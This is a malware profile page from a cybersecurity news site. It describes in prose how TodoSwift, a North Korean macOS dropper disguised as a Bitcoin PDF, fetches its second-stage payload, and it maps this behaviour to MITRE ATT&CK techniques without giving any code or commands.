Menu

  • Alerts
  • Incidents
  • News
  • APTs
  • Cyber Decoded
  • Cyber Hygiene
  • Cyber Review
  • Cyber Tips
  • Definitions
  • Malware
  • Threat Actors
  • Tutorials

Useful Tools

  • Password generator
  • Report an incident
  • Report to authorities
No Result
View All Result
CTF Hack Havoc
CyberMaterial
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
Hall of Hacks
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
No Result
View All Result
Hall of Hacks
CyberMaterial
No Result
View All Result
Home Malware

TodoSwift (Dropper) – Malware

February 13, 2025
Reading Time: 4 mins read
in Malware
TodoSwift (Dropper) – Malware

TodoSwift

Type of Malware

Dropper

Country of Origin

North Korea

Date of Initial Activity

2024

Associated Groups

BlueNoroff

Motivation

Financial Gain

Attack Vectors

Phishing

Targeted Systems

MacOS

Overview

A new and sophisticated macOS malware named TodoSwift has emerged, capturing the attention of the cybersecurity community due to its deceptive techniques and the threat it poses to macOS users. Identified on August 21, 2024, TodoSwift is a dropper application that masquerades as a seemingly innocent PDF related to Bitcoin pricing. This social engineering tactic lures unsuspecting victims into executing the malware, unaware of the hidden danger it carries. While appearing harmless, TodoSwift is a carefully crafted malware developed using Swift/SwiftUI, two powerful programming frameworks for macOS, adding an additional layer of complexity to its execution.

Targets

Individuals

How they operate

Upon first contact, TodoSwift employs a social engineering strategy, presenting itself as an innocent PDF related to Bitcoin pricing. The malware is often distributed through phishing emails or malicious websites, where users are tricked into downloading the file. What seems to be a harmless document is, in fact, a dropper—a type of malware designed to initiate the infection process by deploying additional malicious payloads onto the victim’s machine. The attacker behind TodoSwift uses Google Drive URLs to host the malware, leveraging the trust users have in reputable cloud storage services. By using these services, the attacker avoids raising suspicion and makes the malware more difficult to detect. Once downloaded, TodoSwift operates by executing a dropper application, which has been developed using Swift and SwiftUI—two modern programming languages for macOS and iOS development. The malware’s first action is to use NSTask, an Apple API used to execute external system commands. With NSTask, the malware runs curl commands, a commonly used command-line tool in Unix-based systems. These curl commands retrieve the second-stage payload from remote servers controlled by the attacker. The payload may then be executed on the system, completing the infection cycle and potentially allowing the attacker to take full control of the compromised device. The malware uses Command and Control (C2) communication to establish a persistent link between the compromised device and the attacker’s servers. TodoSwift’s C2 communication often relies on HTTP protocols to send and receive data, which makes it harder to detect since web traffic is typically seen as benign. In addition, TodoSwift makes use of command-line arguments passed during execution, which include embedded C2 URLs. These URLs point to remote servers, where additional malicious payloads or instructions are hosted. Once connected, the compromised system can download more sophisticated malware, upload sensitive information, or execute further commands, all under the attacker’s control. TodoSwift’s use of NSTask and curl commands reflects a clear technical design choice to blend in with regular system operations, thus avoiding detection by traditional security mechanisms. The reliance on macOS system APIs and the use of trusted cloud services for the delivery mechanism are key factors in making the malware difficult to spot in its early stages. Additionally, TodoSwift’s ability to interact with remote servers via web protocols further complicates detection efforts by security tools that might not flag routine web traffic as suspicious. In summary, TodoSwift is a well-crafted malware that capitalizes on user trust, macOS system capabilities, and modern web protocols to carry out its attack. By masquerading as a legitimate PDF, using cloud storage services for delivery, and executing commands via system APIs, it presents a significant threat to macOS users. The malware’s success hinges on its ability to remain stealthy during the initial infection phase, ultimately enabling attackers to steal data or deploy additional malicious software without detection. The increasing sophistication of such threats underscores the need for enhanced security practices, including awareness of social engineering tactics and the use of robust endpoint protection systems.

MITRE Tactics and Techniques

1. Initial Access
Phishing (T1566): Although TodoSwift masquerades as a legitimate PDF file, it follows a social engineering tactic to deceive the user into downloading and executing the malware. The fake PDF is likely distributed via email or other deceptive methods, which is common in phishing attacks. Drive-by Compromise (T1189): The malware is hosted on Google Drive, which is a trusted cloud storage service. Attackers often use reputable services to disguise the origin of the malicious content and trick users into downloading it.
2. Execution
User Execution (T1203): Once the user opens the disguised PDF, the malware is executed. This is a key step where the user unknowingly runs the dropper, starting the attack sequence. Command and Scripting Interpreter (T1059): TodoSwift uses NSTask to execute system commands via the curl command-line tool. This technique is often used to download or retrieve malicious payloads from a remote server.
3. Persistence
Masquerading (T1036): TodoSwift masquerades as a legitimate PDF document to evade detection. By using a trusted file type and naming conventions that appear to be innocuous, it maintains persistence on the system by remaining undetected for as long as possible.
4. Command and Control
Application Layer Protocol (T1071): TodoSwift communicates with a command-and-control (C2) server using web protocols like HTTP. It uses cloud-based storage URLs (such as Google Drive) and embedded C2 URLs in the launch arguments to exfiltrate data or receive further instructions from the attacker.
5. Exfiltration
Exfiltration Over Command and Control Channel (T1041): After retrieving the second-stage payload, the malware is capable of communicating with remote servers over the C2 channel. This can include sending data from the compromised system to the attackers.
6. Impact
Data Manipulation (T1565): If the second-stage payload allows the attackers to modify, steal, or manipulate system data (including files, credentials, or system settings), this could fall under the impact category.
References:
  • TodoSwift Disguises Malware Download Behind Bitcoin PDF
  • TodoSwift: New macOS threat masquerading as a PDF
 
Tags: BitcoinBlueNoroffDroppersGoogleMacOSMalwareNorth KoreaPhishingTodoSwift
ADVERTISEMENT

Related Posts

Iranian Phishing Campaign (Scam) – Malware

Iranian Phishing Campaign (Scam) – Malware

March 2, 2025
Fake WalletConnect (Infostealer) – Malware

Fake WalletConnect (Infostealer) – Malware

March 2, 2025
SilentSelfie (Infostealer) – Malware

SilentSelfie (Infostealer) – Malware

March 2, 2025
Sniper Dz (Scam) – Malware

Sniper Dz (Scam) – Malware

March 2, 2025
TikTok Malware Scam (Trojan) – Malware

TikTok Malware Scam (Trojan) – Malware

March 2, 2025
Zombinder (Exploit Kit) – Malware

Zombinder (Exploit Kit) – Malware

March 2, 2025

Latest Alerts

Mozilla Urgent Firefox Patch Fixes RCE Flaws

ModiLoader Malware Targets Windows Users

Glibc Flaw Gives Linux Root Access Risk

Fileless Remcos RAT Delivery Via LNK Files

FBI Warns of AI Voice Phishing Scams

APT28 RoundPress Webmail Hack Steals Emails

Subscribe to our newsletter

    Latest Incidents

    Massive DDoS Hits Poland’s Civic Platform

    Arla Plant Cyberattack Halts Operations

    Georgia’s Harbin Clinic Hit by Data Breach

    Hackers Target Swiss Reserve Power Plant

    Coinbase Insider Attack Exposed User Data

    Cyberattack Hits J Batista Group

    CyberMaterial Logo
    • About Us
    • Contact Us
    • Jobs
    • Legal and Privacy Policy
    • Site Map

    © 2025 | CyberMaterial | All rights reserved

    Welcome Back!

    Login to your account below

    Forgotten Password?

    Retrieve your password

    Please enter your username or email address to reset your password.

    Log In

    Add New Playlist

    No Result
    View All Result
    • Alerts
    • Incidents
    • News
    • Cyber Decoded
    • Cyber Hygiene
    • Cyber Review
    • Definitions
    • Malware
    • Cyber Tips
    • Tutorials
    • Advanced Persistent Threats
    • Threat Actors
    • Report an incident
    • Password Generator
    • About Us
    • Contact Us
    • Advertise with us

    Copyright © 2025 CyberMaterial